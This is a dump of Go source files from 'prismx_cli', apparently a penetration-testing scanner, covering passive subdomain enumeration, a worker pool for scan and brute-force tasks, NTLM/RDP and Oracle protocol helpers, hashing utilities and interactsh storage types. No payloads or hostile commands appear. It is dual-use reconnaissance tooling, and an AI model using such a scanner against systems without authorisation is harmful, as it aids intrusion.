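-------------------------------------------------------------------------------- /core/subdomain/runner/runner.go: -------------------------------------------------------------------------------- 1 | package runner 2 | 3 | import ( 4 | "prismx_cli/core/subdomain/passive" 5 | "prismx_cli/core/subdomain/subscraping" 6 | "time" 7 | ) 8 | 9 | type Runner struct { 10 | Target string 11 | Timeout time.Duration 12 | } 13 | 14 | func RunEnumeration(run Runner) ([]subscraping.Result, error) { 15 | agent := passive.New(passive.DefaultAllSources, []string{}) 16 | passiveResults, err := agent.EnumerateSubdomains(run.Target, &subscraping.AppKey, run.Timeout*3) 17 | return passiveResults, err 18 | } 19 | -------------------------------------------------------------------------------- /core/subdomain/subscraping/sources/rapiddns/rapiddns.go: -------------------------------------------------------------------------------- 1 | // Package rapiddns is a RapidDNS Scraping Engine in Golang 2 | package rapiddns 3 | 4 | import ( 5 | "context" 6 | "io" 7 | "prismx_cli/core/subdomain/subscraping" 8 | ) 9 |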
10 | // Source is the passive scraping agent 11 | type Source struct{} 12 | 13 | // Run function returns all subdomains found with the service 14 | func (s *Source) Run(ctx context.Context, domain string, session *subscraping.Session) <-chan subscraping.Result { 15 | results := make(chan subscraping.Result) 16 | 17 | go func() { 18 | defer close(results) 19 | 20 | resp, err := session.SimpleGet(ctx, "https://rapiddns.io/subdomain/"+domain+"?full=1") 21 | 22 | if err != nil { 23 | return 24 | } 25 | defer resp.Body.Close() 26 | body, err := io.ReadAll(resp.Body) 27 | if err != nil { 28 | return 29 | } 30 | 31 | src := string(body) 32 | for _, subdomain := range session.Extractor.FindAllString(src, -1) { 33 | results <- subscraping.Result{Source: s.Name(), Value: subdomain} 34 | } 35 | }() 36 | 37 | return results 38 | } 39 | 40 | // Name returns the name of the source 41 | func (s *Source) Name() string { 42 | return "rapiddns" 43 | } 44 | -------------------------------------------------------------------------------- /core/subdomain/subscraping/sources/sublist3r/subllist3r.go: -------------------------------------------------------------------------------- 1 | // Package sublist3r logic 2 | package sublist3r 3 | 4 | import ( 5 | "context" 6 | "encoding/json" 7 | "fmt" 8 | "prismx_cli/core/subdomain/subscraping" 9 | ) 10 | 11 | // Source is the passive scraping agent 12 | type Source struct{} 13 | 14 | // Run function returns all subdomains found with the service 15 | func (s *Source) Run(ctx context.Context, domain string, session *subscraping.Session) <-chan subscraping.Result { 16 | results := make(chan subscraping.Result) 17 | 18 | go func() { 19 | defer close(results) 20 | 21 | resp, err := session.SimpleGet(ctx, fmt.Sprintf("https://api.sublist3r.com/search.php?domain=%s", domain)) 22 | if err != nil { 23 | return 24 | } 25 | defer resp.Body.Close() 26 | var subdomains []string 27 | err = json.NewDecoder(resp.Body).Decode(&subdomains) 28 | if err != nil { 29 
| return 30 | } 31 | 32 | for _, subdomain := range subdomains { 33 | results <- subscraping.Result{Source: s.Name(), Value: subdomain} 34 | } 35 | }() 36 | 37 | return results 38 | } 39 | 40 | // Name returns the name of the source 41 | func (s *Source) Name() string { 42 | return "sublist3r" 43 | } 44 | -------------------------------------------------------------------------------- /core/subdomain/subscraping/types.go: -------------------------------------------------------------------------------- 1 | package subscraping 2 | 3 | import ( 4 | "context" 5 | "regexp" 6 | "time" 7 | 8 | "go.uber.org/ratelimit" 9 | ) 10 | 11 | type Source interface { 12 | Run(context.Context, string, *Session) <-chan Result 13 | Name() string 14 | } 15 | 16 | // Session is the option passed to the source, an option is created 17 | type Session struct { 18 | Timeout time.Duration 19 | Extractor *regexp.Regexp 20 | Keys *Keys 21 | RateLimiter ratelimit.Limiter 22 | } 23 | 24 | // Keys contains the current API Keys we have in store 25 | type Keys struct { 26 | Shodan string 27 | ThreatBook string 28 | Virustotal string 29 | ZoomEyeUserName string 30 | ZoomEyePass string 31 | FofaUsername string 32 | FofaSecret string 33 | HunterUserName string 34 | HunterKey string 35 | FullHunt string 36 | } 37 | 38 | var AppKey Keys 39 | 40 | type Result struct { 41 | Source string 42 | Value string 43 | } 44 | -------------------------------------------------------------------------------- /images/img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yqcs/prismx/8b32e33639e031f38d6f9a4dee4b2a15fec1f13e/images/img.png -------------------------------------------------------------------------------- /images/scan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yqcs/prismx/8b32e33639e031f38d6f9a4dee4b2a15fec1f13e/images/scan.png 
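-------------------------------------------------------------------------------- /images/wx.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yqcs/prismx/8b32e33639e031f38d6f9a4dee4b2a15fec1f13e/images/wx.jpg -------------------------------------------------------------------------------- /images/wx_qrcode.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yqcs/prismx/8b32e33639e031f38d6f9a4dee4b2a15fec1f13e/images/wx_qrcode.jpg -------------------------------------------------------------------------------- /prismx_cli.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |
--------------------------------------------------------------------------------
/scan/task.go:
--------------------------------------------------------------------------------
package scan

import (
	"github.com/panjf2000/ants/v2"
	"prismx_cli/core/models"
	"prismx_cli/utils/logger"
	"prismx_cli/utils/task"
	"time"
)

// TaskPool carries what one scan run needs: the shared worker pool (Scan),
// the scan parameters (Params) and a HydraTask pointer.
type TaskPool struct {
	Scan      *task.Pool
	Params    models.ScanParams
	HydraTask *models.HydraTask
}

// NewPoolWithFunc creates a worker pool of t.Params.Thread workers that run
// function on each submitted item, stores it in pool.PoolWithFunc, calls
// invoke to dispatch the work, waits on pool.Wg and finally releases the
// worker pool.
//
// If the worker pool cannot be created, the error is logged and the method
// returns without dispatching anything.
func (t *TaskPool) NewPoolWithFunc(pool *task.Pool, invoke func(), function func(any)) {
	// Task function executed by each worker.
	workers, err := ants.NewPoolWithFunc(t.Params.Thread, func(i interface{}) {
		// Deferred so a panicking task still gives up its wait-group slot
		// instead of leaving Wait below blocked forever.
		// NOTE(review): Done is signalled on t.Scan.Wg while Wait uses
		// pool.Wg; they are the same object when pool == t.Scan, as in Start.
		// Confirm for any other caller.
		defer t.Scan.Wg.Done()
		function(i)
	})
	if err != nil {
		// Previously the error was discarded and the nil pool was
		// dereferenced further down.
		logger.Error(err.Error())
		return
	}
	pool.PoolWithFunc = workers
	// Dispatch the tasks.
	invoke()
	// Block until every dispatched task has finished.
	pool.Wg.Wait()
	// Release the workers.
	pool.PoolWithFunc.Release()
}

// Start runs the scan task (original note: all alive ports) and logs its
// start and its total duration.
func (t *TaskPool) Start() {
	start := time.Now()
	// Log the start of the run.
	logger.Info(logger.Global.Color().Yellow("Start running scan task"))
	// Blocks until the whole task stream has been processed.
	t.NewPoolWithFunc(t.Scan, t.TaskInChan, t.TaskFunc)
	// Log the end of the run.
	logger.Info(logger.Global.Color().Yellow("The task has ended, taking - " + time.Since(start).String()))
}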
--------------------------------------------------------------------------------
/utils/cryptoPlus/base64.go:
--------------------------------------------------------------------------------
package cryptoPlus

import (
	"encoding/base64"
	"prismx_cli/utils/logger"
)

// Base64Decode decodes a standard (padded) base64 string and returns the
// decoded bytes as a string. Malformed input is logged and yields "", so a
// caller cannot tell a decode failure from an empty payload.
//
// Base64 is a reversible encoding, not encryption: it gives no
// confidentiality and must not be relied on to protect secrets.
func Base64Decode(str string) string {
	decoded, err := base64.StdEncoding.DecodeString(str)
	if err != nil {
		logger.Error(err.Error())
		return ""
	}
	return string(decoded)
}

// Base64Encode returns the standard (padded) base64 encoding of str.
// This is an encoding step only; anyone can reverse it.
func Base64Encode(str string) string {
	encoded := base64.StdEncoding.EncodeToString([]byte(str))
	return encoded
}

--------------------------------------------------------------------------------
/utils/cryptoPlus/bcrypt.go:
--------------------------------------------------------------------------------
package cryptoPlus

import (
	"golang.org/x/crypto/bcrypt"
	"prismx_cli/utils/logger"
)

// ValidateBcryptPassWd reports whether the plaintext password src matches the
// bcrypt hash passWd. The first argument is the plaintext, the second the
// stored hash.
//
// Every comparison error is logged and yields false, so an ordinary wrong
// password also produces an error-level log line.
func ValidateBcryptPassWd(src string, passWd string) bool {
	if err := bcrypt.CompareHashAndPassword([]byte(passWd), []byte(src)); err != nil {
		logger.Error(err.Error())
		return false
	}
	return true
}

// GeneratePassWd returns the bcrypt hash of src computed at
// bcrypt.DefaultCost.
//
// On failure the error is only logged and the result of
// GenerateFromPassword is returned unchanged; callers should treat an empty
// result as a failure and never store it as a password hash.
func GeneratePassWd(src string) []byte {
	res, err := bcrypt.GenerateFromPassword([]byte(src), bcrypt.DefaultCost)
	if err != nil {
		logger.Error(err.Error())
	}
	return res
}

-------------------------------------------------------------------------------- /utils/cryptoPlus/md5.go: -------------------------------------------------------------------------------- 1 | package cryptoPlus 2 | 3 | import ( 4 | "crypto/md5" 5 | "fmt" 6 | "io" 7 | "prismx_cli/utils/logger" 8 | ) 9 | 10 | func ToMD5(str string) string { 11 | m := md5.New() 12 | _, err := io.WriteString(m, str) 13 | if err != nil { 14 | logger.Error(err.Error()) 15 | } 16 | arr
:= m.Sum(nil) 17 | return fmt.Sprintf("%x", arr) 18 | } 19 | -------------------------------------------------------------------------------- /utils/cryptoPlus/sha256.go: -------------------------------------------------------------------------------- 1 | package cryptoPlus 2 | 3 | import ( 4 | "crypto/hmac" 5 | "crypto/sha256" 6 | "encoding/hex" 7 | ) 8 | 9 | func ToSha256(str, keyStr string) string { 10 | s := []byte(str) 11 | key := []byte(keyStr) 12 | m := hmac.New(sha256.New, key) 13 | m.Write(s) 14 | signature := hex.EncodeToString(m.Sum(nil)) 15 | return signature 16 | } 17 | 18 | func SHA256Sum(data any) string { 19 | hash := sha256.New() 20 | if v, ok := data.([]byte); ok { 21 | hash.Write(v) 22 | } else if v, ok := data.(string); ok { 23 | hash.Write([]byte(v)) 24 | } else { 25 | return "" 26 | } 27 | 28 | return hex.EncodeToString(hash.Sum(nil)) 29 | } 30 | -------------------------------------------------------------------------------- /utils/global.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "prismx_cli/utils/arr" 5 | ) 6 | 7 | const ( 8 | DateFormat string = "2006-01-02 15:04:05" 9 | ) 10 | 11 | // GlobalError 通用检查错误信息 12 | func GlobalError(err error) bool { 13 | if err == nil { 14 | return false 15 | } 16 | errs := []string{ 17 | "closed by the remote host", "too many connections", 18 | "i/o timeout", "A connection attempt failed", 19 | "established connection failed", "connection attempt failed", 20 | "Unable to read", "is not allowed to connect to this", 21 | "no pg_hba.conf entry", 22 | "An existing connection was forcibly closed by the remote host", 23 | "No connection could be made", 24 | "local file '/etc/group' is not registered", 25 | "unexpected EOF", 26 | "invalid packet size", 27 | "bad connection", 28 | } 29 | return arr.IsContain(errs, err.Error()) 30 | } 31 | -------------------------------------------------------------------------------- 
/utils/go-ora/advanced_nego/ntlmssp/avids.go: -------------------------------------------------------------------------------- 1 | package ntlmssp 2 | 3 | type avID uint16 4 | 5 | const ( 6 | avIDMsvAvEOL avID = iota 7 | avIDMsvAvNbComputerName 8 | avIDMsvAvNbDomainName 9 | avIDMsvAvDNSComputerName 10 | avIDMsvAvDNSDomainName 11 | avIDMsvAvDNSTreeName 12 | avIDMsvAvFlags 13 | avIDMsvAvTimestamp 14 | avIDMsvAvSingleHost 15 | avIDMsvAvTargetName 16 | avIDMsvChannelBindings 17 | ) 18 | -------------------------------------------------------------------------------- /utils/go-ora/advanced_nego/ntlmssp/messageheader.go: -------------------------------------------------------------------------------- 1 | package ntlmssp 2 | 3 | import ( 4 | "bytes" 5 | ) 6 | 7 | var signature = [8]byte{'N', 'T', 'L', 'M', 'S', 'S', 'P', 0} 8 | 9 | type messageHeader struct { 10 | Signature [8]byte 11 | MessageType uint32 12 | } 13 | 14 | func (h messageHeader) IsValid() bool { 15 | return bytes.Equal(h.Signature[:], signature[:]) && 16 | h.MessageType > 0 && h.MessageType < 4 17 | } 18 | 19 | func newMessageHeader(messageType uint32) messageHeader { 20 | return messageHeader{signature, messageType} 21 | } 22 | -------------------------------------------------------------------------------- /utils/go-ora/advanced_nego/ntlmssp/unicode.go: -------------------------------------------------------------------------------- 1 | package ntlmssp 2 | 3 | import ( 4 | "bytes" 5 | "encoding/binary" 6 | "errors" 7 | "unicode/utf16" 8 | ) 9 | 10 | // helper func's for dealing with Windows Unicode (UTF16LE) 11 | 12 | func fromUnicode(d []byte) (string, error) { 13 | if len(d)%2 > 0 { 14 | return "", errors.New("Unicode (UTF 16 LE) specified, but uneven data length") 15 | } 16 | s := make([]uint16, len(d)/2) 17 | err := binary.Read(bytes.NewReader(d), binary.LittleEndian, &s) 18 | if err != nil { 19 | return "", err 20 | } 21 | return string(utf16.Decode(s)), nil 22 | } 23 | 24 | func toUnicode(s string) 
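[]byte { 25 | uints := utf16.Encode([]rune(s)) 26 | b := bytes.Buffer{} 27 | binary.Write(&b, binary.LittleEndian, &uints) 28 | return b.Bytes() 29 | } 30 |
--------------------------------------------------------------------------------
/utils/go-ora/advanced_nego/ntlmssp/varfield.go:
--------------------------------------------------------------------------------
package ntlmssp

import (
	"errors"
)

// varField locates one variable-length payload inside a message buffer: Len
// bytes starting at BufferOffset. MaxLen is stored next to Len but is not
// consulted by the read helpers in this file.
type varField struct {
	Len          uint16
	MaxLen       uint16
	BufferOffset uint32
}

// ReadFrom returns the part of buffer described by f, or an error when the
// field does not lie entirely inside buffer. The returned slice aliases
// buffer; it is not a copy.
//
// Len and BufferOffset have to be treated as untrusted input
// (NOTE(review): they are presumably decoded from a message sent by the
// peer; confirm against the callers). The bounds check is therefore done in
// 64-bit arithmetic: in uint32 the sum BufferOffset+Len can wrap around to a
// small value, pass the length comparison, and then make the slice
// expression panic because the start index is larger than the end index.
func (f varField) ReadFrom(buffer []byte) ([]byte, error) {
	start := uint64(f.BufferOffset)
	end := start + uint64(f.Len) // cannot wrap: at most (2^32-1)+(2^16-1)
	if end > uint64(len(buffer)) {
		return nil, errors.New("Error reading data, varField extends beyond buffer")
	}
	return buffer[start:end], nil
}

// ReadStringFrom reads the field from buffer with ReadFrom and returns it as
// a string. When unicode is true the bytes are decoded with fromUnicode
// (UTF-16LE); otherwise they are converted to a string byte for byte.
func (f varField) ReadStringFrom(buffer []byte, unicode bool) (string, error) {
	d, err := f.ReadFrom(buffer)
	if err != nil {
		return "", err
	}
	if unicode { // UTF-16LE encoding scheme
		return fromUnicode(d)
	}
	// OEM encoding, close enough to ASCII, since no code page is specified
	return string(d), err
}

// newVarField describes a field of fieldsize bytes placed at offset *ptr and
// then advances *ptr by fieldsize. The conversions to uint16 and uint32
// truncate silently if fieldsize or *ptr do not fit those types.
func newVarField(ptr *int, fieldsize int) varField {
	f := varField{
		Len:          uint16(fieldsize),
		MaxLen:       uint16(fieldsize),
		BufferOffset: uint32(*ptr),
	}
	*ptr += fieldsize
	return f
}

-------------------------------------------------------------------------------- /utils/go-ora/advanced_nego/ntlmssp/version.go: -------------------------------------------------------------------------------- 1 | package ntlmssp 2 | 3 | // Version is a struct representing https://msdn.microsoft.com/en-us/library/cc236654.aspx 4 | type Version struct { 5 | ProductMajorVersion uint8 6 | ProductMinorVersion uint8 7 | ProductBuild uint16 8 | _ [3]byte 9 | NTLMRevisionCurrent uint8 10 | } 11 | 12 | // DefaultVersion returns a Version with "sensible" defaults (Windows 7) 13 | func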
DefaultVersion() Version { 14 | return Version{ 15 | ProductMajorVersion: 6, 16 | ProductMinorVersion: 1, 17 | ProductBuild: 7601, 18 | NTLMRevisionCurrent: 15, 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /utils/go-ora/converters/max_len.go: -------------------------------------------------------------------------------- 1 | package converters 2 | 3 | var ( 4 | // MAX_LEN_VARCHAR2 int = 0x7FFF 5 | // MAX_LEN_NVARCHAR2 = 0x7FFF 6 | // MAX_LEN_RAW = 0x7FFF 7 | MAX_LEN_BOOL = 0x2 8 | MAX_LEN_NUMBER = 0x16 9 | MAX_LEN_DATE = 0xB 10 | MAX_LEN_TIMESTAMP = 0xD 11 | ) 12 | -------------------------------------------------------------------------------- /utils/go-ora/transaction.go: -------------------------------------------------------------------------------- 1 | package go_ora 2 | 3 | import ( 4 | "context" 5 | "database/sql/driver" 6 | ) 7 | 8 | type Transaction struct { 9 | conn *Connection 10 | ctx context.Context 11 | } 12 | 13 | func (tx *Transaction) Commit() error { 14 | if tx.conn.State != Opened { 15 | return driver.ErrBadConn 16 | } 17 | tx.conn.autoCommit = true 18 | tx.conn.session.ResetBuffer() 19 | tx.conn.session.StartContext(tx.ctx) 20 | defer tx.conn.session.EndContext() 21 | return (&simpleObject{connection: tx.conn, operationID: 0xE}).exec() 22 | } 23 | 24 | func (tx *Transaction) Rollback() error { 25 | if tx.conn.State != Opened { 26 | return driver.ErrBadConn 27 | } 28 | tx.conn.autoCommit = true 29 | tx.conn.session.ResetBuffer() 30 | tx.conn.session.StartContext(tx.ctx) 31 | defer tx.conn.session.EndContext() 32 | return (&simpleObject{connection: tx.conn, operationID: 0xF}).exec() 33 | } 34 | -------------------------------------------------------------------------------- /utils/go-rdp/core/types.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | import "prismx_cli/utils/go-rdp/emission" 4 | 5 | type Transport interface { 6 | Read(b 
[]byte) (n int, err error) 7 | Write(b []byte) (n int, err error) 8 | Close() error 9 | 10 | On(event, listener interface{}) *emission.Emitter 11 | Once(event, listener interface{}) *emission.Emitter 12 | Emit(event interface{}, arguments ...interface{}) *emission.Emitter 13 | } 14 | 15 | type FastPathListener interface { 16 | RecvFastPath(secFlag byte, s []byte) 17 | } 18 | 19 | type FastPathSender interface { 20 | SendFastPath(secFlag byte, s []byte) (int, error) 21 | } 22 |
--------------------------------------------------------------------------------
/utils/go-rdp/protocol/nla/encode.go:
--------------------------------------------------------------------------------
package nla

import (
	"crypto/hmac"
	"crypto/md5"
	"crypto/rc4"
	"strings"

	"golang.org/x/crypto/md4"
	"prismx_cli/utils/go-rdp/core"
)

// The helpers in this file wrap MD4, MD5, HMAC-MD5 and RC4. All four are
// legacy primitives that are no longer considered secure; they appear here
// because the NTLM computations below are defined in terms of them. They
// should not be reused for new designs.

// MD4 returns the MD4 digest of data.
func MD4(data []byte) []byte {
	h := md4.New()
	h.Write(data)
	return h.Sum(nil)
}

// MD5 returns the MD5 digest of data.
func MD5(data []byte) []byte {
	h := md5.New()
	h.Write(data)
	return h.Sum(nil)
}

// HMAC_MD5 returns the HMAC-MD5 of data under key.
func HMAC_MD5(key, data []byte) []byte {
	h := hmac.New(md5.New, key)
	h.Write(data)
	return h.Sum(nil)
}

// Version 2 of NTLM hash function
//
// NTOWFv2 computes HMAC-MD5 keyed with the MD4 digest of the encoded
// password, over the encoded concatenation of the upper-cased user name and
// the domain (the domain is not upper-cased). Encoding is done by
// core.UnicodeEncode, presumably UTF-16LE; verify in package core.
func NTOWFv2(password, user, domain string) []byte {
	return HMAC_MD5(MD4(core.UnicodeEncode(password)), core.UnicodeEncode(strings.ToUpper(user)+domain))
}

// Same as NTOWFv2
func LMOWFv2(password, user, domain string) []byte {
	return NTOWFv2(password, user, domain)
}

// RC4K applies the RC4 key stream derived from key to src and returns the
// result in a new slice of the same length; src is not modified.
//
// NOTE(review): the error from rc4.NewCipher is discarded. The standard
// library rejects keys that are empty or longer than 256 bytes and returns a
// nil cipher in that case, so such a key makes the XORKeyStream call below
// panic. Callers must pass a key of valid length.
func RC4K(key, src []byte) []byte {
	result := make([]byte, len(src))
	rc4obj, _ := rc4.NewCipher(key)
	rc4obj.XORKeyStream(result, src)
	return result
}

-------------------------------------------------------------------------------- /utils/httpResult/return.go: -------------------------------------------------------------------------------- 1 | package httpResult 2 | 3 | import ( 4 |
"github.com/gin-gonic/gin" 5 | "net/http" 6 | ) 7 | 8 | type Resp struct { 9 | Status string `json:"status"` // 状态 10 | Code int `json:"code"` // 状态码 11 | Data any `json:"data"` // 数据集 12 | Message string `json:"message"` // 消息 13 | } 14 | 15 | // FAILURE 失败数据处理 16 | func FAILURE(c *gin.Context, code int, message string) { 17 | c.JSON(code, Resp{ 18 | Code: code, 19 | Status: "failure", 20 | Message: message, 21 | Data: nil, 22 | }) 23 | } 24 | 25 | // SUCCESS 通常成功数据处理 26 | func SUCCESS(c *gin.Context, data any) { 27 | c.JSON(http.StatusOK, Resp{ 28 | Code: http.StatusOK, 29 | Data: data, 30 | Status: "success", 31 | Message: "请求成功", 32 | }) 33 | } 34 | -------------------------------------------------------------------------------- /utils/interactsh/pkg/options/session-info.go: -------------------------------------------------------------------------------- 1 | package options 2 | 3 | type SessionInfo struct { 4 | ServerURL string `yaml:"server-url"` 5 | Token string `yaml:"server-token"` 6 | PrivateKey string `yaml:"private-key"` 7 | CorrelationID string `yaml:"correlation-id"` 8 | SecretKey string `yaml:"secret-key"` 9 | PublicKey string `yaml:"public-key"` 10 | } 11 | -------------------------------------------------------------------------------- /utils/interactsh/pkg/server/http_server.go: -------------------------------------------------------------------------------- 1 | package server 2 | 3 | // RegisterRequest is a request for client registration to interactsh server. 4 | type RegisterRequest struct { 5 | // PublicKey is the public RSA Key of the client. 6 | PublicKey string `json:"public-key"` 7 | // SecretKey is the secret-key for correlation ID registered for the client. 8 | SecretKey string `json:"secret-key"` 9 | // CorrelationID is an ID for correlation with requests. 10 | CorrelationID string `json:"correlation-id"` 11 | } 12 | 13 | // DeregisterRequest is a request for client deregistration to interactsh server. 
14 | type DeregisterRequest struct { 15 | // CorrelationID is an ID for correlation with requests. 16 | CorrelationID string `json:"correlation-id"` 17 | // SecretKey is the secretKey for the interactsh client. 18 | SecretKey string `json:"secret-key"` 19 | } 20 | 21 | // PollResponse is the response for a polling request 22 | type PollResponse struct { 23 | Data []string `json:"data"` 24 | Extra []string `json:"extra"` 25 | AESKey string `json:"aes_key"` 26 | TLDData []string `json:"tlddata,omitempty"` 27 | } 28 | -------------------------------------------------------------------------------- /utils/interactsh/pkg/server/util.go: -------------------------------------------------------------------------------- 1 | package server 2 | 3 | import ( 4 | "strings" 5 | 6 | "github.com/asaskevich/govalidator" 7 | "github.com/rs/xid" 8 | ) 9 | 10 | func (options *Options) isCorrelationID(s string) bool { 11 | if len(s) == options.GetIdLength() && govalidator.IsAlphanumeric(s) { 12 | // xid should be 12 13 | if options.CorrelationIdLength != 12 { 14 | return true 15 | } else if _, err := xid.FromString(strings.ToLower(s[:options.CorrelationIdLength])); err == nil { 16 | return true 17 | } 18 | } 19 | return false 20 | } 21 | -------------------------------------------------------------------------------- /utils/interactsh/pkg/storage/error.go: -------------------------------------------------------------------------------- 1 | package storage 2 | 3 | import "errors" 4 | 5 | var ErrCorrelationIdNotFound = errors.New("could not get correlation-id from cache") 6 | -------------------------------------------------------------------------------- /utils/interactsh/pkg/storage/storage.go: -------------------------------------------------------------------------------- 1 | // storage defines a storage mechanism 2 | package storage 3 | 4 | type Storage interface { 5 | GetCacheMetrics() (*CacheMetrics, error) 6 | SetIDPublicKey(correlationID, secretKey, publicKey string) error 7 | 
SetID(ID string) error 8 | AddInteraction(correlationID string, data []byte) error 9 | AddInteractionWithId(id string, data []byte) error 10 | GetInteractions(correlationID, secret string) ([]string, string, error) 11 | GetInteractionsWithId(id string) ([]string, error) 12 | RemoveID(correlationID, secret string) error 13 | GetCacheItem(token string) (*CorrelationData, error) 14 | Close() error 15 | } 16 | -------------------------------------------------------------------------------- /utils/interactsh/pkg/storage/types.go: -------------------------------------------------------------------------------- 1 | package storage 2 | 3 | import ( 4 | "sync" 5 | "time" 6 | ) 7 | 8 | type GetInteractionsFunc func() []string 9 | 10 | type CacheMetrics struct { 11 | HitCount uint64 `json:"hit-count"` 12 | MissCount uint64 `json:"miss-count"` 13 | LoadSuccessCount uint64 `json:"load-success-count"` 14 | LoadErrorCount uint64 `json:"load-error-count"` 15 | TotalLoadTime time.Duration `json:"total-load-time"` 16 | EvictionCount uint64 `json:"eviction-count"` 17 | } 18 | 19 | // CorrelationData is the data for a correlation-id. 20 | type CorrelationData struct { 21 | sync.Mutex 22 | // data contains data for a correlation-id in AES encrypted json format. 23 | Data []string `json:"data"` 24 | // secretkey is a secret key for original user verification 25 | SecretKey string `json:"-"` 26 | // AESKey is the AES encryption key in encrypted format. 
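27 | AESKeyEncrypted string `json:"aes-key"` 28 | // decrypted AES key for signing 29 | AESKey []byte `json:"-"` 30 | } 31 |
--------------------------------------------------------------------------------
/utils/netUtils/body.go:
--------------------------------------------------------------------------------
package netUtils

import (
	"bytes"
	"io"
	"net/http"
)

// CopyRespBody returns the complete response body and leaves resp.Body
// readable again by replacing it with an in-memory copy of the same bytes.
// It returns nil when resp or resp.Body is nil.
//
// A read error is deliberately ignored: whatever was read before the error
// is both returned and put back as the new body.
//
// The whole body is buffered in memory with no size limit, so a server that
// streams a very large response makes this call allocate that much. Callers
// that talk to untrusted hosts should bound the response size before calling.
func CopyRespBody(resp *http.Response) []byte {
	if resp == nil || resp.Body == nil {
		return nil
	}
	// Take a copy of the body.
	bodyBytes, _ := io.ReadAll(resp.Body)
	// The original stream is replaced below and would otherwise never be
	// closed, which can keep its connection from being released.
	_ = resp.Body.Close()
	// Put the copy back so later readers still see the full body.
	resp.Body = io.NopCloser(bytes.NewBuffer(bodyBytes))
	return bodyBytes
}

// CopyReqBody returns the complete request body and leaves req.Body readable
// again by replacing it with an in-memory copy of the same bytes. It returns
// nil when req or req.Body is nil, or when reading the body fails; on a read
// failure req.Body is left as it was.
//
// As with CopyRespBody, the body is buffered without a size limit.
func CopyReqBody(req *http.Request) []byte {
	if req == nil || req.Body == nil {
		return nil
	}
	data, err := io.ReadAll(req.Body)
	if err != nil {
		return nil
	}
	// The original stream is fully consumed and about to be replaced.
	_ = req.Body.Close()
	// Write the body back before anything binds the request.
	req.Body = io.NopCloser(bytes.NewBuffer(data))
	return data
}

-------------------------------------------------------------------------------- /utils/putils/async/async.go: -------------------------------------------------------------------------------- 1 | package async 2 | 3 | import "context" 4 | 5 | // Future mimics the async/await paradigm 6 | type Future[T any] interface { 7 | Await() (T, error) 8 | } 9 | 10 | type future[T any] struct { 11 | await func(ctx context.Context) (T, error) 12 | } 13 | 14 | func (f future[T]) Await() (T, error) { 15 | return f.await(context.Background()) 16 | } 17 | 18 | func Exec[T any](f func() (T, error)) Future[T] { 19 | var ( 20 | result T 21 | err error 22 | ) 23 | c := make(chan struct{}) 24 | go func() { 25 | defer close(c) 26 | 27 | result, err = f() 28 | }() 29 | return future[T]{ 30 | await: func(ctx context.Context) (T, error) { 31 | select { 32 | case <-ctx.Done(): 33 | return result, ctx.Err() 34 | case <-c: 35 | return result, err 36 | } 37 | }, 38 | } 39 | } 40 |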
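--------------------------------------------------------------------------------
/utils/putils/async/async_test.go:
--------------------------------------------------------------------------------
package async

import (
	"testing"
	"time"

	"github.com/stretchr/testify/require"
)

// TestAsync starts a slow task with Exec, does unrelated work, then checks
// that Await returns the task's result without an error.
func TestAsync(t *testing.T) {
	// Async
	do := Exec(func() (bool, error) {
		time.Sleep(2 * time.Second)
		return true, nil
	})

	// do some other stuff
	time.Sleep(time.Second)

	// Await
	ok, err := do.Await()
	require.Nil(t, err)
	require.True(t, ok)
}
--------------------------------------------------------------------------------
/utils/putils/batcher/doc.go:
--------------------------------------------------------------------------------
// batcher is a package that provides a simple batching mechanism
// the buffer can be configured with a max capacity and a flush interval
// the buffer will invoke a callback function when the buffer is full or the flush interval is reached
package batcher
--------------------------------------------------------------------------------
/utils/putils/buffer/disk.go:
--------------------------------------------------------------------------------
package buffer

import (
	"io"
	"os"
)

// DiskBuffer is a write buffer backed by a temporary file instead of memory.
type DiskBuffer struct {
	f *os.File
}

// New creates a DiskBuffer on a fresh temporary file in the default temp
// directory. The caller must call Close to remove the file.
func New() (*DiskBuffer, error) {
	f, err := os.CreateTemp("", "")
	if err != nil {
		return nil, err
	}

	return &DiskBuffer{f: f}, nil
}

// Write appends b to the backing file.
func (db *DiskBuffer) Write(b []byte) (int, error) {
	return db.f.Write(b)
}

// WriteAt writes b to the backing file at offset off.
func (db *DiskBuffer) WriteAt(b []byte, off int64) (int, error) {
	return db.f.WriteAt(b, off)
}

// WriteString appends s to the backing file.
func (db *DiskBuffer) WriteString(s string) (int, error) {
	return db.f.WriteString(s)
}

// Bytes returns the whole content of the backing file.
//
// NOTE(review): the file is re-read by name rather than through the held
// descriptor, so this trusts that the temp path still refers to the file
// created by New.
func (db *DiskBuffer) Bytes() ([]byte, error) {
	return os.ReadFile(db.f.Name())
}

// String returns the whole content of the backing file as a string.
func (db *DiskBuffer) String() (string, error) {
	data, err := db.Bytes()
	return string(data), err
}

// Reader opens an independent read handle on the backing file.
// All readers must be closed to avoid an FD leak.
func (db *DiskBuffer) Reader() (io.ReadSeekCloser, error) {
	f, err := os.Open(db.f.Name())
	if err != nil {
		// Return a literal nil: a nil *os.File stored in the interface would
		// compare as non-nil for callers that test the reader itself.
		return nil, err
	}
	return f, nil
}

// Close closes the backing file and removes it from disk.
func (db *DiskBuffer) Close() {
	name := db.f.Name()
	// Best-effort cleanup: Close has no error return, so failures are
	// dropped deliberately.
	_ = db.f.Close()
	_ = os.RemoveAll(name)
}
--------------------------------------------------------------------------------
/utils/putils/channelutil/utils.go:
--------------------------------------------------------------------------------
package channelutil

// CreateNChannels creates and returns N channels, keyed 0..count-1, each
// buffered with bufflen slots.
func CreateNChannels[T any](count int, bufflen int) map[int]chan T {
	x := map[int]chan T{}

	for i := 0; i < count; i++ {
		x[i] = make(chan T, bufflen)
	}
	return x
}
--------------------------------------------------------------------------------
/utils/putils/conn/connpool/inflight.go:
--------------------------------------------------------------------------------
package connpool

import (
	"errors"
	"net"

	"go.uber.org/multierr"
	mapsutil "prismx_cli/utils/putils/maps"
)

// InFlightConns tracks the connections that are currently in use so they can
// all be closed together.
type InFlightConns struct {
	inflightConns *mapsutil.SyncLockMap[net.Conn, struct{}]
}

// NewInFlightConns returns an empty tracker. The error result is always nil
// in this implementation.
func NewInFlightConns() (*InFlightConns, error) {
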